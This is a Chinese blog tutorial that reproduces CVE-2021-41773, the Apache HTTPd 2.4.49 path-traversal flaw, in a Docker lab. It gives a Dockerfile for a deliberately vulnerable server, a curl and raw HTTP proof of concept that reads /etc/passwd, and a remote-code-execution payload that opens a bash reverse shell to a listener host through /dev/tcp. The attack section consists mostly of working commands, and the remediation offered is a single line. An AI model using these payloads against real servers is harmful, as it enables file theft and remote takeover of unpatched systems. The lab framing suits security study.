Apahce HTTPd 2.4.49(CVE-2021-41773)漏洞复现详细教程

最新推荐文章于 2025-03-12 23:06:09 发布
最新推荐文章于 2025-03-12 23:06:09 发布
阅读量1w 收藏 2
点赞数 2
分类专栏: # 中间件漏洞复现&插件漏洞复现 文章标签: apache2.4.49 CVE-2021-41773
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40412037/article/details/120777496
版权

一、漏洞描述

Apache HTTP Server 是 Apache 基础开放的流行的 HTTP 服务器。在其 2.4.49 版本中,引入了一个路径体验,满足下面两个条件的 Apache 服务器将受到影响:

1、版本等于2.4.49
2、Require all granted(默认情况下是允许被访问的)。

攻击者利用这个漏洞,可以读取到Apache服务器Web目录以外的其他文件,或者读取Web中的脚本源码,或者在开启cgi或cgid的服务器上执行任意命令。

二、影响版本

Apache HTTP Server 2.4.49

三、靶场准备

本实验使用vulhub环境,节约搭建时间

mkdir Dockerfile //在空目录里面创建Dockerfile目录
cd Dockerfile //进入Dockerfile目录
vi Dockerfile //创建文件Dockerfil并编写

在这里插入图片描述
DockerFile文件内容:

FROM httpd:2.4.49

RUN set -ex \
    && sed -i "s|#LoadModule cgid_module modules/mod_cgid.so|LoadModule cgid_module modules/mod_cgid.so|g" /usr/local/apache2/conf/httpd.conf \
    && sed -i "s|#LoadModule cgi_module modules/mod_cgi.so|LoadModule cgi_module modules/mod_cgi.so|g" /usr/local/apache2/conf/httpd.conf \
    && sed -i "s|#Include conf/extra/httpd-autoindex.conf|Include conf/extra/httpd-autoindex.conf|g" /usr/local/apache2/conf/httpd.conf \
    && cat /usr/local/apache2/conf/httpd.conf \
        | tr '\n' '\r' \
        | perl -pe 's|<Directory />.*?</Directory>|<Directory />\n    AllowOverride none\n    Require all granted\n</Directory>|isg' \
        | tr '\r' '\n' \
        | tee /tmp/httpd.conf \
    && mv /tmp/httpd.conf /usr/local/apache2/conf/httpd.conf

接下来在 Dockerfile 文件的存放目录下,执行构建动作。
以下示例,通过目录下的 Dockerfile 构建一个 httpd:2.4.49rce(镜像名称:镜像标签)。

注:最后的 . 代表本次执行的上下文路径。

docker build -t  httpd:2.4.49rce .

在这里插入图片描述
在这里插入图片描述

运行docker

docker run  -d -p 85:80 httpd:2.4.49rce

在这里插入图片描述
之后就可以通过浏览器访问量(如果浏览器访问不了,重新启动实验机后再启动docker就可以解决该问题)
在这里插入图片描述

四、POC测试

目录遍历POC:

curl -v --path-as-is http://XXXXX:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

或者

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 192.168.241.142:85
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Connection: close

在这里插入图片描述
在服务器上启用 mods cgi 或 cgid 后,此路径遍历漏洞将允许任意命令执行,(此靶场是已启用cgid)

远程代码执行POC:

curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/192.168.190.146/8888 0>&1' "http://XXXXX:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"

或者

GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: 192.168.241.142:85
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Connection: close
Content-Length: 8

echo;pwd

在这里插入图片描述
另外有检测工具,可以直接检测和getshell:
在这里插入图片描述
在这里插入图片描述

五、漏洞修复

升级到Apache HTTP Server最新版本。

更多资源:
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥
在这里插入图片描述

如何挖掘Apache2中的CVE-2021-41773漏洞
HBohan的博客
12-06 3349
根据Apache官方发布的安全公告,Apache HTTP Server中存在一个路径穿越漏洞漏洞编号为CVE-2021-41773。A
Apache HTTP Server 2.4.49 路径穿越漏洞复现及利用
Tauil的博客
07-23 3427
ApacheHTTPServer是Apache基金会开源的一款流行的HTTP服务器。版本等于2.4.49穿越的目录允许被访问,比如配置了。(默认情况下是不允许的)攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。.....................
Apache 漏洞复现(vulhub)
最新发布
huangdingyu6的博客
03-12 882
在有多个后缀的情况下,只要一个文件含有后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。要匹配 $ 字符本身,请使用 $。从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意命令。
Apahce HTTPd 2.4.49/2.4.50(CVE-2021-42013)漏洞复现详细教程
W小哥
10-14 4002
一、漏洞描述 Apache HTTP Server 2.4.50 中对 CVE-2021-41773修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。 二、影响版本 Apache 2.4.49Apache 2.4.50 三、靶场准备 本实验使用vulhub环境,节约搭建时间 mkdir Docker
漏洞复现Apahce HTTPd 2.4.49CVE-2021-41773)路径穿越漏洞
中二电工吹短笛的博客
05-09 743
是一个开源、跨平台的Web服务器,它在全球范围内被广泛使用。2021年10月5日,Apache发布更新公告,修复了中的一个路径遍历和文件泄露漏洞。攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护(默认禁用),则这些恶意请求就会成功。除此之外,该漏洞还可能会导致泄漏 CGI 脚本等解释文件的来源。
Apache HTTP Server 2.4.49 路径穿越漏洞CVE-2021-41773
weixin_45366453的博客
07-21 919
Apache HTTP Server 2.4.49 路径穿越漏洞CVE-2021-41773
Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-41773)
weixin_42786460的博客
09-25 1148
Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-41773)
linux源码编译安装apache( httpd-2.4.53)处理服务器支持 TLS Client-initiated 重协商攻击(CVE-2011-1473)
liaodaoguo的博客
03-30 1914
linux源码编译安装apache 首先我们需要下载相关的依赖包 apr、apr-util、pcre 1.配置依赖环境 (1) 配置apr依赖 解压依赖包: tar -xf apr-1.7.0.tar.gz 进入解压后的目录:cd apr-1.7.0 配置(设置安装在/usr/local/apr)./configure --prefix=./configure --prefix=/usr/local/apr 编译并安装:make && make install (2) 配置apr-util
Apache漏洞—多后缀名解析、目录遍历和(CVE-2017-15715)
今天也要加油鸭
03-25 5908
文章目录一、Apache httpd 多后缀解析漏洞漏洞原理漏洞复现漏洞修复 Apache HTTP Server(简称Apache)是Apache软件基金会的一个开放源码的网页服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩展,将Perl/Python等解释器编译到服务器中。 一、Apache h...
文件解析漏洞总结(IIS,APACHE,NGINX)
st3pby的博客
11-03 1510
文件解析漏洞总结(IIS,APACHE,NGINX)
CVE-2024-38077漏洞复现修复(无坑版教程)
weixin_61782918的博客
08-13 1万+
微软超高危“狂躁许可”漏洞CVE-2024-38077的检测及修复过程
Apache 2.4.49 路径穿越漏洞复现CVE-2021-41773
qq_51163834的博客
05-31 529
攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。启动环境前要先到对应的目录。如本次对CVE-2021-41773漏洞进行复现,先到vulhub/httpd/CVE-2021-41773目录下启动环境。首次尝试要先安装docker、docker-compose、vulhub。Burpsuite中,获取passwd文件内容。反弹shell。Burpsuit下输出当前用户。
【web安全】CVE漏洞复现
weixin_46301214的博客
11-22 1027
漏洞不能直接反弹shell,需要先下载反弹shell文件,然后执行shell文件。当然了使用curl下载前,你需要先搭建一个web服务器,然后上传好shell文件。【CVE-2018-1273】springboot漏洞 - RCE。【CVE-2018-1273】springboot漏洞 - RCE。POC:篡改post传参的输入命令即可触发RCE。云服务器开启端口监听,然后执行一下文件即可。存在路径后,随便输入点东西,然后抓包。特点:无回显触发RCE。先扫路径:/users。
【网络安全---漏洞复现】Tomcat CVE-2024-1938 漏洞复现和利用过程(特详细
2401_84264010的博客
05-08 1840
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
CVE-2016-4977(Spring-Security-Oauth)RCE远程命令执行漏洞复现(详细版!)
精品博客,你值得一看~
09-02 1796
它是为了解决企业应用开发的复杂性而创建的。Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞。#按 " i "进行编辑 ,然后复制下面的脚本 , 再按 " Esc "键 ,再按冒号wq " :wq " 保存并退出.先cd到spring目录下的CVE-2016-4977里面,然后使用docker-compose启动环境.
【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细
热门推荐
m0_67844671的博客
09-12 2万+
Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细);Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。AJP(Apache JServ Protocol)是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。WEB服务器通过 TCP连接
华为家用路由器CVE漏洞复现CVE-2017-17215)
weixin_45904478的博客
01-20 997
因工作原因,需要复现一下华为家用路由器HG532的远程RCE漏洞,但是参考网上教程操作时踩了一些坑,所以记录一下复现成功的全部过程。
CVE-2021-41773 漏洞复现
Jay17的博客
07-13 1074
CVE-2021-41773 漏洞复现
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W小哥1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值